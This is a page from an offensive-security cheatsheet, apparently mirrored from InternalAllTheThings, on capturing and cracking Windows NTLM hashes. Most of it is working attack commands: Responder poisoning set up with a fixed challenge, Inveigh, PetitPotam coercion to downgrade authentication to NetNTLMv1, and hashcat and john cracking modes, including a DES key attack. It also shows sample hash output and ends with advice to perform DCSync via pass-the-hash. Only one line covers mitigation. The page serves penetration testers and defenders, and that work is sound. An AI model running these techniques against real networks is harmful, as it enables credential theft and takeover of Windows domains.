daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

hash-capture.md (11774B)


      1 ---
      2 title: "Hash - Capture and Cracking"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/hash-capture.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/hash-capture.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Hash - Capture and Cracking
     12 
     13 ## Hash Cracking Table
     14 
     15 | Mode   | Hash type                   | Generic hash format                                                                |
     16 | -----: | --------------------------- | ---------------------------------------------------------------------------------- |
     17 | `3000` | LM                          | `<LM_HASH>`                                                                        |
     18 | `1000` | NT                          | `<NT_HASH>`                                                                        |
     19 | `5500` | NetNTLMv1 / NetNTLMv1+ESS   | `<USERNAME>::<DOMAIN>:<LM_RESPONSE>:<NTLM_RESPONSE>:<SERVER_CHALLENGE>`            |
     20 | `5600` | NetNTLMv2                   | `<USERNAME>::<DOMAIN>:<SERVER_CHALLENGE>:<NT_PROOF_STRING>:<NTLMV2_RESPONSE_BLOB>` |
     21 | `2100` | Domain Cached Credentials 2 | `$DCC2$<PBKDF2_ITERATIONS>#<USERNAME>#<DCC2_HASH>`                                 |
     22 
     23 ### LM Hash
     24 
     25 All hashes are not born equals, **LM hash (LAN Manager hash)** is an obsolete Windows password-hashing format. Here are the steps to reproduce the LM hashing method.
     26 
     27 1. Convert the password to uppercase.
     28 2. Pad or truncate it to exactly 14 characters.
     29 3. Split it into two independent 7-character halves.
     30 4. Convert each half into a DES key.
     31 5. Use each key to encrypt the fixed string.
     32 6. Concatenate the two 8-byte results.
     33 
     34 LM hash can be cracked easily.
     35 
     36 ### NT Hash
     37 
     38 NT hash might be cracked depending on the size of the password. However it is also possible to use it without breaking it, see the **Hash - Pass the Hash** page.
     39 
     40 ### DCC2 Hash
     41 
     42 DCC2 is also called **MSCache v2** or **Domain Cached Credentials v2**. Unlike NetNTLM challenge-response formats, it does not contain a domain, server challenge, or client response. It represents a locally cached domain credential verifier.
     43 
     44 ## LmCompatibilityLevel
     45 
     46 LmCompatibilityLevel is a Windows security setting that determines the level of authentication protocol used between computers. It specifies how Windows handles NTLM and LAN Manager (LM) authentication protocols, impacting how passwords are stored and how authentication requests are processed. The level can range from 0 to 5, with higher levels generally providing more secure authentication methods.
     47 
     48 ```ps1
     49 reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel
     50 ```
     51 
     52 * **Level 0** - Send LM and NTLM response; never use NTLM 2 session security. Clients use LM and NTLM authentication, and never use NTLM 2 session security; domain controllers accept LM, NTLM, and NTLM 2 authentication.
     53 * **Level 1** - Use NTLM 2 session security if negotiated. Clients use LM and NTLM authentication, and use NTLM 2 session security if the server supports it; domain controllers accept LM, NTLM, and NTLM 2 authentication.
     54 * **Level 2** - Send NTLM response only. Clients use only NTLM authentication, and use NTLM 2 session security if the server supports it; domain controllers accept LM, NTLM, and NTLM 2 authentication.
     55 * **Level 3** - Send NTLM 2 response only. Clients use NTLM 2 authentication, and use NTLM 2 session security if the server supports it; domain controllers accept LM, NTLM, and NTLM 2 authentication.
     56 * **Level 4** - Domain controllers refuse LM responses. Clients use NTLM authentication, and use NTLM 2 session security if the server supports it; domain controllers refuse LM authentication (that is, they accept NTLM and NTLM 2).
     57 * **Level 5** - Domain controllers refuse LM and NTLM responses (accept only NTLM 2). Clients use NTLM 2 authentication, use NTLM 2 session security if the server supports it; domain controllers refuse NTLM and LM authentication (they accept only NTLM 2).A client computer can only use one protocol in talking to all servers. You cannot configure it, for example, to use NTLM v2 to connect to Windows 2000-based servers and then to use NTLM to connect to other servers. This is by design.
     58 
     59 ## Capturing Net-NTLMv1/NTLMv1 hashes
     60 
     61 > Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication. They are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys.
     62 
     63 :information_source: Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes.
     64 
     65 **Requirements**:
     66 
     67 * `LmCompatibilityLevel = 0x1`: Send LM and NTLM response
     68 
     69 **Exploitation**:
     70 
     71 * Capturing using [lgandx/Responder](https://github.com/lgandx/Responder): Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge
     72 
     73     ```ps1
     74     HTTPS = On
     75     DNS = On
     76     LDAP = On
     77     ...
     78     ; Custom challenge.
     79     ; Use "Random" for generating a random challenge for each requests (Default)
     80     Challenge = 1122334455667788
     81     ```
     82 
     83 * Fire Responder: `responder -I eth0 --lm`, if `--disable-ess` is set, extended session security will be disabled for NTLMv1 authentication
     84 * Force a callback:
     85 
     86     ```ps1
     87     PetitPotam.exe Responder-IP DC-IP # Patched around August 2021
     88     PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP # Not patched for authenticated users
     89     ```
     90 
     91 ## Cracking Net-NTLMv1/NTLMv1 hashes
     92 
     93 * If you got some `NetNTLMv1 tokens`, you can try to **shuck** them online via [shuck.sh](https://shuck.sh/) or locally/on-premise via [ShuckNT](https://github.com/yanncam/ShuckNT/) to get NT-hashes corresponding from [HIBP database](https://haveibeenpwned.com/Passwords). If the NT-hash has previously leaked, the NetNTLMv1 is converted to NT-hash ([pass-the-hash](/internal/active-directory/hash-pass-the-hash) ready) instantly. The [shucking process](https://www.youtube.com/watch?v=OQD3qDYMyYQ) works for any NetNTLMv1 with or without ESS/SSP (challenge != `1122334455667788`) but mainly for user account (plaintext previsouly leaked).
     94 
     95     ```ps1
     96     # Submit NetNTLMv1 online to https://shuck.sh/get-shucking.php
     97     # Or shuck them on-premise via ShuckNT script:
     98     $ php shucknt.php -f tokens-samples.txt -w pwned-passwords-ntlm-reversed-ordered-by-hash-v8.bin
     99 
    100     [...]
    101     10 hashes-challenges analyzed in 3 seconds, with 8 NT-Hash instantly broken for pass-the-hash and 1 that can be broken via crack.sh for free.
    102     [INPUT] ycam::ad:DEADC0DEDEADC0DE00000000000000000000000000000000:70C249F75FB6D2C0AC2C2D3808386CCAB1514A2095C582ED:1122334455667788
    103     [NTHASH-SHUCKED] 93B3C62269D55DB9CA660BBB91E2BD0B
    104     ```
    105 
    106 * If you got some `NetNTLMv1 tokens`, you can also try to crack them via [crack.sh](https://crack.sh/)/[ntlmv1.com](https://ntlmv1.com/). For this you need to format them to submit them on [crack.sh](https://crack.sh/netntlm/)/[ntlmv1.com](https://ntlmv1.com/). The converter of [shuck.sh](https://shuck.sh/) can be used to format easily.
    107 
    108     ```ps1
    109     # When there is no-ESS/SSP and the challenge is set to 1122334455667788, it's free (0$):
    110     username::hostname:response:response:challenge -> NTHASH:response
    111     NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972
    112 
    113     # When there is ESS/SSP or challenge != 1122334455667788, it's chargeable from $20-$200:
    114     username::hostname:lmresponse+0padding:ntresponse:challenge -> $NETNTLM$challenge$ntresponse
    115     $NETNTLM$DEADC0DEDEADC0DE$507E2A2131F4AF4A299D8845DE296F122CA076D49A80476E
    116     ```
    117 
    118 * Finaly, if no [shuck.sh](https://shuck.sh/) nor [crack.sh](https://crack.sh/) can be used, you can try to break NetNTLMv1 with Hashcat / John The Ripper. Use [Net-NTLMv1 Rainbow Tables](https://tables.blurbdust.pw/) to speed up the plain text recovery.
    119 
    120     ```ps1
    121     john --format=netntlm hash.txt
    122     hashcat -m 5500 -a 3 hash.txt # for NetNTLMv1(-ESS/SSP) to plaintext (for user account)
    123     hashcat -m 27000 -a 0 hash.txt nthash-wordlist.txt # for NetNTLMv1(-ESS/SSP) to NT-hash (for user and computer account, depending on nthash-wordlist quality)
    124     hashcat -m 14000 -a 3 inputs.txt --hex-charset -1 /usr/share/hashcat/charsets/DES_full.hcchr ?1?1?1?1?1?1?1?1 # for NetNTLMv1(-ESS/SSP) to DES-keys (KPA-attack) of user/computer account with 100% success rate, then regenerate NT-hash with these DES-keys on https://shuck.sh/converter.php.
    125     ```
    126 
    127 * Now you can DCSync using the Pass-The-Hash with the DC machine account
    128 
    129 :warning: NetNTLMv1 with ESS / SSP (Extended Session Security / Security Support Provider) changes the final challenge by adding a new alea (!= `1122334455667788`, so chargeable on [crack.sh](https://crack.sh/)).
    130 
    131 :warning: NetNTLMv1 format is `login::domain:lmresp:ntresp:clientChall`. If the `lmresp` contains a **0's-padding** this means that the token is protected by **ESS/SSP**.
    132 
    133 :warning: NetNTLMv1 final challenge is the Responder's challenge itself (`1122334455667788`) when there is no ESS/SSP. If ESS/SSP is enabled, the final challenge is the first 8 bytes of the MD5 hash from the concatenation of the client challenge and server challenge. The details of the algorithmic generation of a NetNTLMv1 are illustrated on the [shuck.sh/generator.php](https://shuck.sh/generator.php) and detailed in [MISCMag#128](https://connect.ed-diamond.com/misc/misc-128/shuck-hash-before-trying-to-crack-it).
    134 
    135 :warning: If you get some tokens from other tools ([OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) or [moxie0/chapcrack](https://github.com/moxie0/chapcrack)) in other formats, like tokens starting with the prefix `$MSCHAPv2$`, `$NETNTLM$` or `$99$`, they correspond to a classic NetNTLMv1 and can be converted from one format to another [shuck.sh/converter.php](https://shuck.sh/converter.php).
    136 
    137 **Mitigations**:
    138 
    139 * Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM`
    140 
    141 ## Capturing and cracking Net-NTLMv2/NTLMv2 hashes
    142 
    143 If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
    144 
    145 * [lgandx/Responder](https://github.com/lgandx/Responder)
    146 
    147     ```powershell
    148     sudo ./Responder.py -I eth0 -wfrd -P -v
    149     ```
    150 
    151 * [Kevin-Robertson/Inveigh](https://github.com/Kevin-Robertson/Inveigh)
    152 
    153     ```powershell
    154     .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N]
    155     ```
    156 
    157 * [EmpireProject/Invoke-Inveigh.ps1](https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Invoke-Inveigh.ps1)
    158 
    159     ```powershell
    160     Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y
    161     ```
    162 
    163 Crack the hashes with Hashcat / John The Ripper
    164 
    165 ```ps1
    166 john --format=netntlmv2 hash.txt
    167 hashcat -m 5600 -a 3 hash.txt
    168 ```
    169 
    170 ## References
    171 
    172 * [NTLMv1_Downgrade.md - S3cur3Th1sSh1t - 09/07/2021](https://gist.github.com/S3cur3Th1sSh1t/0c017018c2000b1d5eddf2d6a194b7bb)
    173 * [Practical Attacks against NTLMv1 - Esteban Rodriguez - September 15, 2022](https://trustedsec.com/blog/practical-attacks-against-ntlmv1)
    174 * [Attacking LM/NTLMv1 Challenge/Response Authentication - defence in depth - April 21, 2011](http://www.defenceindepth.net/2011/04/attacking-lmntlmv1-challengeresponse_21.html)
    175 * [CRACKING NETLM/NETNTLMV1 AUTHENTICATION - crack.sh](https://crack.sh/netntlm/)
    176 * [NTLMv1 to NTLM Reversing - evilmog - 03-03-2020](https://hashcat.net/forum/thread-9009-post-47806.html)